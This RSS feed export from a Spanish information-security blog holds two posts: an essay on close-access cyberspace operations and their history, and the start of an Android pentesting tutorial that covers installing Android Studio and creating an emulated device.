<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Security Art Work</title>
	<atom:link href="https://www.securityartwork.es/feed/?lang=es" rel="self" type="application/rss+xml" />
	<link>https://www.securityartwork.es/</link>
	<description>Blog de Seguridad de la Información de S2 Grupo</description>
	<lastBuildDate>Tue, 24 Oct 2023 16:47:42 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.2</generator>
	<item>
		<title>Operaciones de proximidad en el ciberespacio</title>
		<link>https://www.securityartwork.es/2023/10/24/operaciones-de-proximidad-en-el-ciberespacio/</link>
					<comments>https://www.securityartwork.es/2023/10/24/operaciones-de-proximidad-en-el-ciberespacio/#respond</comments>
		
		<dc:creator><![CDATA[Antonio Villalón]]></dc:creator>
		<pubDate>Tue, 24 Oct 2023 16:47:08 +0000</pubDate>
				<category><![CDATA[Cyber Intelligence]]></category>
		<category><![CDATA[Inteligencia]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31219</guid>

					<description><![CDATA[<p>En el ámbito de las operaciones en el ciberespacio, la mayor parte de operaciones de ataque o explotación son remotas, es decir, se realizan a través de tecnologías que permiten al actor hostil no estar físicamente cerca de su objetivo: un acceso vía VPN, un correo electrónico o enlace dañino que instala un implante en [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/10/24/operaciones-de-proximidad-en-el-ciberespacio/">Operaciones de proximidad en el ciberespacio</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>En el ámbito de las operaciones en el ciberespacio, la mayor parte de operaciones de ataque o explotación son remotas, es decir, se realizan a través de tecnologías que permiten al actor hostil no estar físicamente cerca de su objetivo: un acceso vía VPN, un correo electrónico o enlace dañino que instala un implante en la víctima, una vulnerabilidad remota explotada exitosamente, etc. Pero un pequeño porcentaje de operaciones requieren un acercamiento físico entre el actor hostil y su objetivo: son las operaciones de proximidad, llamadas también <em>Sneaker Operations</em> o CACO (<em>Close Access Cyberspace Operations</em>).</p>


<div class="wp-block-image">
<figure class="alignleft size-medium is-resized"><img decoding="async" src="https://www.securityartwork.es/wp-content/uploads/2023/10/Hagelin_CX-52-IMG_0568-white-1-300x241.jpg" alt="Crypto AG CX-52. Fuente: WikiPedia." class="wp-image-31223" width="296" height="238" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/Hagelin_CX-52-IMG_0568-white-1-300x241.jpg 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/Hagelin_CX-52-IMG_0568-white-1-740x594.jpg 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/Hagelin_CX-52-IMG_0568-white-1-768x616.jpg 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/Hagelin_CX-52-IMG_0568-white-1-1536x1232.jpg 1536w, https://www.securityartwork.es/wp-content/uploads/2023/10/Hagelin_CX-52-IMG_0568-white-1-2048x1643.jpg 2048w" sizes="(max-width: 296px) 100vw, 296px" /></figure></div>


<p>Cuando no todo estaba conectado a Internet, las operaciones de proximidad eran casi la única vía de acceso a los sistemas o la información del objetivo; para robar información había que colocar un micro o una cámara colándose por la noche en un edificio, modificando una cadena de suministro o situándose en un edificio enfrente de las instalaciones del objetivo, por poner unos ejemplos. Algunas de las acciones de adquisición de inteligencia de señales requerían esta proximidad, y esta proximidad evidentemente implicaba un riesgo significativo de ser neutralizado, con todas las implicaciones que esta neutralización puede tener. Algunos ejemplos muy conocidos de operaciones de proximidad para adquisición de inteligencia de señales implican (presuntamente) a la DGSE francesa implantando micros en los asientos <em>business</em> de los vuelos de Air France entre París y Nueva York, a los soviéticos (presuntamente) regalando un Gran Sello con un <a href="https://en.wikipedia.org/wiki/The_Thing_(listening_device)">implante</a> al embajador estadounidense en la URSS o a alemanes y estadounidenses (presuntamente) manipulando dispositivos de cifra de Crypto AG en la <a href="https://en.wikipedia.org/wiki/Operation_Rubicon)">operación Rubicon</a>.</p>



<span id="more-31219"></span>



<p>Pero llega un momento en el que tenemos tantas cosas conectadas a Internet que podemos realizar operaciones completas de ataque o explotación a través de la red, de manera remota, sin exponernos físicamente a ser neutralizados -o al menos, exponiéndonos menos-. Por este motivo las operaciones de proximidad empiezan a perder protagonismo frente a las operaciones remotas: en el terreno ciber, las más habituales son éstas, frente a las operaciones que requieren esa proximidad física. Entre otros muchos beneficios, las operaciones remotas entrañan menos riesgos para el actor que las ejecuta y, como hemos dicho, en la mayor parte de casos cumplen con sus objetivos.</p>



<p>No obstante, en algunos casos las operaciones remotas tienen poca probabilidad de éxito, son excesivamente complejas o simplemente no se pueden abordar desde un punto de vista técnico. Es en estos casos en los que pueden entrar en juego las operaciones de proximidad. Como hemos dicho, las operaciones de proximidad son aquellas que requieren una cercanía física con el objetivo. La proximidad puede ser humana, mediante un operador, o mecánica, mediante un dispositivo que se aproxime físicamente al objetivo, como un UXV.</p>



<p>Frente a las operaciones remotas, las operaciones de proximidad apenas han sido analizadas por la industria y la comunidad científica. Apenas hay literatura técnica que las describa o discuta, y por supuesto la información que sale (voluntariamente) de los servicios de inteligencia en relación con sus capacidades es nula. No obstante, sí es público -gracias a los papeles de Snowden- que la NSA estadounidense tiene capacidades para realizar ciber operaciones de proximidad (por ejemplo, COTTONMOUTH o HOWLERMONKEY requieren cierta proximidad para ser implantados), que ejecuta estas operaciones (por ejemplo, a través del programa TAREX) y que colabora con otras agencias de la comunidad estadounidense para realizar dichas operaciones (por ejemplo, dentro del programa <em>Sentry Osprey</em> o a través del <em>Special Collection Service</em>).</p>



<p>Y si la información públicamente disponible en relación con las capacidades de proximidad en el ciberespacio es escasa, la disponible acerca de las propias operaciones de proximidad aún lo es menos. La única operación de este tipo que ha visto la luz ha sido la realizada por el GRU ruso en La Haya, contra la Organización para la Prohibición de las Armas Químicas (<em>Organisation for the Prohibition of Chemical Weapons</em>), en 2018. Esta operación fue neutralizada por la inteligencia holandesa y sus detalles <a href="https://www.defensie.nl/downloads/publicaties/2018/10/04/gru-close-access-cyberoperatie-tegen-opcw">expuestos públicamente</a> por el director del MIVD.</p>



<p>Adicionalmente a los servicios de inteligencia, grupos ligados al ciber crimen también disponen de capacidades de proximidad, y las propias empresas proveedoras ofrecemos también servicios de auditoría física que implican acciones de proximidad (lo que se llama <em>black team</em>). No tan habituales ni tan demandados como los servicios remotos, pero necesarios en ocasiones.</p>



<p>Los dos elementos que definen las operaciones de proximidad en el ciberespacio son la aproximación que realiza el actor hostil a su objetivo y el artefacto técnico que emplea para la acción (<em>bug</em> o implante). La aproximación tiene tres características fundamentales: la relación entre actor hostil y objetivo (intruso o <em>insider</em>), el transporte utilizado para la acción (humano o mecánico) y el punto donde se ejecuta el compromiso (cadena de suministro u operación). Por su parte, el artefacto también tiene tres características fundamentales: el tipo de implante (hardware, software o sin implante), la proximidad con el objetivo (directo o cercano) y la interacción con éste (pasiva o activa). Con estos elementos podemos caracterizar las operaciones de proximidad en el ciberespacio y también las operaciones de proximidad dirigidas a la adquisición de inteligencia de señales.</p>



<p>Esta caracterización sencilla de las operaciones de proximidad, o las acciones de proximidad en general, no se contempla de manera especial en MITRE ATT&amp;CK, donde tampoco se hace hincapié en tácticas o técnicas que puedan abordarse con acciones de proximidad. MITRE ATT&amp;CK únicamente cita algunas técnicas particulares que implican o pueden implicar proximidad: por ejemplo, “<em>Hardware Additions</em>” para el acceso inicial o ”<em>Exfiltration Over Physical Medium</em>” para el caso de la exfiltración. Aunque esta falta de foco en las operaciones de proximidad por parte de la principal referencia a la hora de identificar tácticas y técnicas hostiles (y sus contramedidas) puede tener una explicación lógica, y es que es más probable ser víctima de una operación remota que serlo de una operación de proximidad, al no estar referenciadas en este marco de trabajo, algunas organizaciones no las considerarán entre sus amenazas y por tanto no desplegarán salvaguardas para mitigarlas.</p>



<p>Resumiendo, una operación de proximidad es, como su nombre indica, aquella que requiere cierta proximidad entre actor hostil y objetivo: un actor hostil que accede a las instalaciones de su objetivo para implantar un <em>router</em>, ese mismo actor que rompe la cadena de suministro para implantar ese mismo <em>router</em>, ese mismo actor utilizando un UAV para comprometer una WiFi del objetivo… Hoy en día tenemos un nivel de conectividad muy elevado, lo que favorece el éxito de las operaciones remotas y por tanto reduce el número de operaciones de proximidad. No obstante, éstas existen, alguna es públicamente conocida, y diferentes actores (servicios, grupos delincuenciales, empresas…) tienen capacidades para desarrollarlas cuando se evalúan como la mejor opción.</p>



<p>Por último, una curiosidad sobre las operaciones de proximidad: el concepto “proximidad” no está definido en ningún sitio (o no lo he encontrado). ¿Qué es “proximidad”? ¿Contacto directo? ¿Un metro? ¿Un kilómetro? Sin entrar en formalismos, podemos definir como “proximidad” la distancia física entre un actor hostil y su objetivo que permite a éste detectar o neutralizar a dicho actor hostil. Aunque habitualmente esta distancia es del orden de metros, con los mecanismos de transporte mecánicos, por ejemplo, con un dron, esta distancia puede incrementarse hasta los kilómetros.</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/10/24/operaciones-de-proximidad-en-el-ciberespacio/">Operaciones de proximidad en el ciberespacio</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.securityartwork.es/2023/10/24/operaciones-de-proximidad-en-el-ciberespacio/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Pentesting en Android (I): Configuración del entorno</title>
		<link>https://www.securityartwork.es/2023/10/02/pentesting-en-android-i-configuracion-del-entorno/</link>
					<comments>https://www.securityartwork.es/2023/10/02/pentesting-en-android-i-configuracion-del-entorno/#respond</comments>
		
		<dc:creator><![CDATA[Gema de la Fuente]]></dc:creator>
		<pubDate>Mon, 02 Oct 2023 10:04:59 +0000</pubDate>
				<category><![CDATA[General]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31145</guid>

					<description><![CDATA[<p>En este artículo vamos a tratar de explicar, paso a paso de la forma más sencilla posible, cómo crear un entorno de trabajo para realizar un hacking ético sobre una aplicación de un dispositivo Android, de tal forma que lo pueda realizar cualquier persona independientemente de los conocimientos que tenga. El primer paso es la [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/10/02/pentesting-en-android-i-configuracion-del-entorno/">Pentesting en Android (I): Configuración del entorno</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>En este artículo vamos a tratar de explicar, paso a paso de la forma más sencilla posible, cómo crear un entorno de trabajo para realizar un hacking ético sobre una aplicación de un dispositivo Android, de tal forma que lo pueda realizar cualquier persona independientemente de los conocimientos que tenga.</p>



<p>El primer paso es la creación de un entorno de trabajo para comenzar una auditoria de aplicaciones móviles en Android. Para ello, veremos varios emuladores de dispositivos móviles y elegiremos uno en el cual montaremos nuestro entorno.</p>



<h2 class="wp-block-heading">Algunos emuladores en el mercado</h2>



<p>Empecemos por explicar que es un emulador. Esta palabra procede del vocablo latino <em>aemulātor </em>(emula), es decir, algo que imita el funcionamiento de otra cosa. Wikipedia lo define de la siguiente forma: “<em>En informática, un emulador es un software que permite ejecutar programas o videojuegos en una plataforma (sea una arquitectura de hardware o un sistema operativo) diferente de aquella para la cual fueron escritos originalmente. A diferencia de un simulador, que solo trata de reproducir el comportamiento del programa, un emulador trata de modelar de forma precisa el dispositivo de manera que este funcione como si estuviese siendo usado en el aparato original</em>”.</p>



<span id="more-31145"></span>



<p>Una vez explicado este concepto procedemos a nombrar algunos de estos emuladores que nos podemos encontrar en el mercado:</p>



<ul>
<li><strong><a href="https://developer.android.com/studio">Android Studio</a></strong>: Iniciamos la lista con el software sobre el que montaremos nuestro entorno. En este caso, nos encontramos ante una herramienta oficial y no tenemos que preocuparnos del adware (software diseñado para mostrar anuncios en la pantalla) o de que incluyan decenas de aplicaciones preinstaladas.</li>
</ul>



<ul>
<li><strong><a href="https://www.genymotion.com/download/">Genymotion</a></strong>: Otro de los emuladores más popular y que, además, ofrece tanto una versión de escritorio como en la nube, consumiendo muchos menos recursos del ordenador. La única “pega” es que está centrada en desarrolladores por lo que puede parecer un poco más compleja para el usuario básico. Además, comentar que en esta ocasión nos encontramos con un programa limitado en su parte gratis y con todas las funciones en su tarifa de pago.</li>
</ul>



<ul>
<li><strong><a href="https://www.bluestacks.com/es/index.html">BlueStacks</a></strong>: Es de las herramientas más veteranas y conocidas para emular. En este caso, nos encontramos con una interfaz adaptada para escritorio del ordenador, por lo que no lo veríamos como un móvil por ello se suele utilizar para jugar principalmente.</li>
</ul>



<ul>
<li><strong><a href="https://es.bignox.com/">NOX</a></strong>: Otro emulador centrado en el gaming.</li>
</ul>



<ul>
<li><strong><a href="https://visualstudio.microsoft.com/es/vs/msft-android-emulator/">Visual Studio</a></strong>: Emulador gratuito, rápido y dispone de varios perfiles de dispositivos que permiten emular una gran variedad de hardware de Android.</li>
</ul>



<ul>
<li><strong><a href="http://www.memuplay.com/">MEmu Play</a></strong>: Es otra alternativa centrada en los juegos, es decir, toda la experiencia e interfaz está adaptada para poder jugar a juegos de Android en un PC.</li>
</ul>



<h2 class="wp-block-heading">Instalación del emulador Android Studio</h2>



<p>Como hemos comentado, nosotros vamos a elegir Android Studio como emulador de este entorno, pero sois libres de utilizar cualquiera de los anteriormente expuestos. Nuestra maquina anfitriona será un Windows.</p>



<p>Procedemos a buscar en Google “<em>Android developer studio</em>” y nos muestra lo siguiente:</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-740x273.png" alt="" class="wp-image-31146" width="740" height="273" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-740x273.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-300x111.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-768x284.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image.png 796w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Os facilitamos el link por si queréis ir directamente a la página: <a href="https://developer.android.com/studio">https://developer.android.com/studio</a></p>



<p>En la página pulsamos<em> “Download Android Studio Electrio Eel” </em>para que inicie la descarga del instalador.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-1-740x390.png" alt="" class="wp-image-31147" width="740" height="390" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-1-740x390.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-1-300x158.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-1-768x405.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-1.png 875w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>Nos saldrá un cuadro con las condiciones y términos legales donde deberemos marcar el consentimiento y darle a <em>“Download Android Studio Electrio Eel | 2022.1.1 Patch 2 for Windows” </em>y ahora sí, iniciará la descarga.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-2.png" alt="" class="wp-image-31148" width="714" height="496" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-2.png 714w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-2-300x208.png 300w" sizes="(max-width: 714px) 100vw, 714px" /></figure></div>


<p>Como podemos ver en la siguiente imagen, nos descarga un fichero <em>“.exe”,</em> en el cual haremos doble clic para iniciar la instalación.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="127" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-3-740x127.png" alt="" class="wp-image-31149" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-3-740x127.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-3-300x51.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-3-768x132.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-3.png 916w" sizes="(max-width: 740px) 100vw, 740px" /></figure></div>


<p>A continuación se abrirá el panel de instalación y pulsaremos en <em>“Next”</em> para ir a la siguiente vista.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-4.png" alt="" class="wp-image-31150" width="464" height="365" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-4.png 619w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-4-300x236.png 300w" sizes="(max-width: 464px) 100vw, 464px" /></figure></div>


<p>En la siguiente ventana nos mostrará los componentes que se van a instala. Estos los dejamos como muestran por defecto y pulsamos en <em>“Next”</em>.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-5.png" alt="" class="wp-image-31151" width="520" height="409" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-5.png 693w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-5-300x236.png 300w" sizes="(max-width: 520px) 100vw, 520px" /></figure></div>


<p>A continuación, nos mostrará la ruta donde se instalará indicando que debe tener como mínimo 500 MB de espacio libre. En <em>“Browser”</em> podremos modificar dicha ruta por defecto si así lo consideramos.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-6.png" alt="" class="wp-image-31152" width="556" height="442" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-6.png 741w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-6-300x238.png 300w" sizes="(max-width: 556px) 100vw, 556px" /></figure></div>


<p>Posteriormente, nos preguntarán si queremos crear un acceso directo como se muestra a continuación.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-7-740x586.png" alt="" class="wp-image-31153" width="555" height="440" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-7-740x586.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-7-300x238.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-7.png 768w" sizes="(max-width: 555px) 100vw, 555px" /></figure></div>


<p>Cuando se complete la descarga pulsaremos en <em>“Next”.</em></p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-8-740x584.png" alt="" class="wp-image-31154" width="555" height="438" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-8-740x584.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-8-300x237.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-8-768x606.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-8.png 770w" sizes="(max-width: 555px) 100vw, 555px" /></figure></div>


<p>Por último, en la siguiente pantalla pulsaremos en “<em>Finish</em>”.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-9-740x583.png" alt="" class="wp-image-31155" width="555" height="437" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-9-740x583.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-9-300x236.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-9-768x605.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-9.png 803w" sizes="(max-width: 555px) 100vw, 555px" /></figure></div>


<p>Una vez terminamos la instalación básica, comenzamos con la configuración de la herramienta dándole a <em>“Next”</em>.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-10-740x566.png" alt="" class="wp-image-31156" width="555" height="425" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-10-740x566.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-10-300x229.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-10-768x587.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-10.png 789w" sizes="(max-width: 555px) 100vw, 555px" /></figure></div>


<p>Seleccionamos la instalación “Standard” debido a que con esta es suficiente y nos ahorrará tiempo y algún que otro dolor de cabeza.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-11.png" alt="" class="wp-image-31157" width="547" height="417" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-11.png 729w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-11-300x229.png 300w" sizes="(max-width: 547px) 100vw, 547px" /></figure></div>


<p>En el siguiente apartado, seleccionamos el tema que queremos usar, por defecto vienen dos instalados: el tema claro y oscuro.&nbsp; En nuestro caso será <em>“Darcula”</em>.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-12.png" alt="" class="wp-image-31158" width="554" height="423" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-12.png 738w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-12-300x229.png 300w" sizes="(max-width: 554px) 100vw, 554px" /></figure></div>


<p>Y procedemos a la instalación de los complementos necesarios para el uso de la herramienta dándole a <em>“Next”</em>.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-13-740x565.png" alt="" class="wp-image-31159" width="555" height="424" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-13-740x565.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-13-300x229.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-13-768x586.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-13.png 791w" sizes="(max-width: 555px) 100vw, 555px" /></figure></div>


<p>Aceptamos los términos y condiciones y <em>“Finish”</em>.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-14-740x563.png" alt="" class="wp-image-31160" width="555" height="422" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-14-740x563.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-14-300x228.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-14-768x585.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-14.png 796w" sizes="(max-width: 555px) 100vw, 555px" /></figure></div>


<p>Veremos como inicia la descarga de los paquetes y cuando termine pulsaremos en <em>“Finish”</em>.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-15.png" alt="" class="wp-image-31161" width="537" height="410" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-15.png 716w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-15-300x229.png 300w" sizes="(max-width: 537px) 100vw, 537px" /></figure></div>


<p>Una vez terminamos la instalación se nos abre el panel de los proyectos.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-16.png" alt="" class="wp-image-31162" width="544" height="447" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-16.png 725w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-16-300x247.png 300w" sizes="(max-width: 544px) 100vw, 544px" /></figure></div>


<p>En el desplegable seleccionaremos <em>“More Actions”</em> y posteriormente seleccionaremos la opción <em>“Virtual Device Manager”</em> para crear nuestro dispositivo Android:</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-17.png" alt="" class="wp-image-31163" width="551" height="453" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-17.png 734w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-17-300x247.png 300w" sizes="(max-width: 551px) 100vw, 551px" /></figure></div>


<p><strong>AVISO</strong>!! A veces esta opción se encuentra bloqueada. Si esto sucede, lo que haremos será seleccionar la opción SDK Manager que se encuentra justo encima:</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-18-740x606.png" alt="" class="wp-image-31164" width="555" height="455" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-18-740x606.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-18-300x246.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-18.png 758w" sizes="(max-width: 555px) 100vw, 555px" /></figure></div>


<p>Se nos abrirá la siguiente ventana, donde tendremos que comprobar dos cosas principalmente:</p>



<ol type="1">
<li>La ruta <em>“Android SDK Location”</em> si aparece en rojo será porque la ruta no es válida y deberemos proporcionarle una admitida.</li>
</ol>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="908" height="333" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-19.png" alt="" class="wp-image-31165" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-19.png 908w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-19-300x110.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-19-740x271.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-19-768x282.png 768w" sizes="(max-width: 908px) 100vw, 908px" /></figure></div>


<ul>
<li>En la pestaña <em>“SDK Tools”</em> tenemos que revisar que tengamos instalado el paquete <em>“Android SDK Build-Tools 33”.</em> Si no es el caso, deberemos seleccionar el cuadrado de la izquierda del paquete y darle a <em>“OK”</em> para que se descargue e instale.</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="913" height="679" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-20.png" alt="" class="wp-image-31166" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-20.png 913w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-20-300x223.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-20-740x550.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-20-768x571.png 768w" sizes="(max-width: 913px) 100vw, 913px" /></figure></div>


<p>A modo informativo, en la pestaña <em>“SDK Platforms”</em> podemos ver y descargar las distintas versiones de Android que podemos instalar en los dispositivos emulados.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="773" height="576" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-21.png" alt="" class="wp-image-31167" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-21.png 773w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-21-300x224.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-21-740x551.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-21-768x572.png 768w" sizes="(max-width: 773px) 100vw, 773px" /></figure></div>


<p>Volvemos a la opción anteriormente comentada <em>“Virtual Device Manager”</em> para empezar con la creación del dispositivo.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-22-740x613.png" alt="" class="wp-image-31168" width="555" height="460" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-22-740x613.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-22-300x248.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-22-768x636.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-22.png 838w" sizes="(max-width: 555px) 100vw, 555px" /></figure></div>


<p>Se abrirá la siguiente ventana y seleccionaremos el botón “<em>Create device</em>” o en el link con el mismo nombre situado en el centro del cuerpo de la venta.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/10/image-23-740x355.png" alt="" class="wp-image-31169" width="555" height="266" srcset="https://www.securityartwork.es/wp-content/uploads/2023/10/image-23-740x355.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-23-300x144.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-23-768x368.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/10/image-23.png 916w" sizes="(max-width: 555px) 100vw, 555px" /></figure></div>


<p>Se nos mostrará la siguiente ventana con las categorías y las características de los dispositivos que podemos encontrar en la plataforma.</p>


<div class="wp-block-image">
